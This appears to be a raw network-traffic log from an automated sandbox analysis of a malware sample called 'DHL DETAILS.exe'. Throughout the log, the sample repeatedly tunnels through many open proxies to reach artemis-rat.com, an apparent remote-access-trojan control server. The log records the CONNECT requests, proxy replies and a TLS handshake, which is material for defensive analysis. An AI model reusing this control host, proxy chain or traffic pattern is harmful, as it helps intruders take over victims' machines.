                                                                                    248192.168.2.55080773.151.59.35208166352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.193329096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    249192.168.2.550022184.170.248.541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.200985909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    250192.168.2.550024184.170.245.14841456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.202518940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    251192.168.2.550688128.140.26.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.208786011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.518464088 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.25.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    252192.168.2.550728134.209.29.12031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.214379072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.536053896 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    253192.168.2.550869172.67.105.234806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.216439962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.370934963 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    254192.168.2.550672193.239.58.9280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.223215103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    255192.168.2.550887172.64.80.55806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.226052999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.380620956 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    256192.168.2.550891104.20.67.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.227442980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.381745100 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    257192.168.2.550876162.159.246.135806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.228799105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.390300989 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    258192.168.2.550902104.19.79.238806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.231528997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.386262894 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    259192.168.2.550907104.21.223.181806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.233541012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.388700008 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    260192.168.2.550681178.54.21.20380816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.235349894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    261192.168.2.55084838.162.15.9831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.255844116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.695621967 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    262192.168.2.55079743.163.192.3156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.256187916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    263192.168.2.55070352.67.10.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.256674051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.585067987 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:13.585453033 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 94 a1 ad b8 cc 97 18 e2 c0 a1 a2 04 af 0d 72 26 e9 e9 c8 6f 87 c6 23 87 71 81 26 37 ef 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRr&o#q&7*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:13.912369013 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 88 72 46 5b b8 1e 03 1b 94 25 e3 71 eb 8b 05 67 e5 db 5e 96 f5 98 51 3a 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9rF[%qg^Q:DOWNGRD0000*H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0*H0Z~fVz'
                                                                                    Mar 9, 2024 13:14:14.266180038 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 39 e6 4d 05 0a 0d 6b 77 61 5b c0 95 62 83 66 43 d9 dc b6 83 5b 6d 86 b2 74 ee 13 2d 8f 8c 64 5e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 c2 52 b8 b2 14 b8 c8 cd d0 f7 d9 f6 82 e3 e1 e7 4b 80 65 f0 05
                                                                                    Data Ascii: %! 9Mkwa[bfC[mt-d^(RKe*Bq&
                                                                                    Mar 9, 2024 13:14:14.591711044 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 f9 03 3f 85 bc 59 27 31 da 23 d5 a7 69 48 1d 59 f8 df ca 39 a3 dd 41 ee a6 24 9f 80 68 53 8d 53 5b 8c 53 af 2b 7a af f0
                                                                                    Data Ascii: (?Y'1#iHY9A$hSS[S+z


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    264192.168.2.550917162.159.241.5806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.256931067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.419702053 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    265192.168.2.550926104.23.125.117806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.256932020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.413084030 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    266192.168.2.551192202.159.60.654436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.257108927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    267192.168.2.55070687.247.251.24031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.257179976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.942467928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.926872969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.036585093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.037066936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    268192.168.2.550033120.194.4.15754436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.257191896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.278430939 CET319INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 170
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    269192.168.2.550727167.172.91.21980006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.257483006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.597507954 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    270192.168.2.551197202.159.60.654436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.258752108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


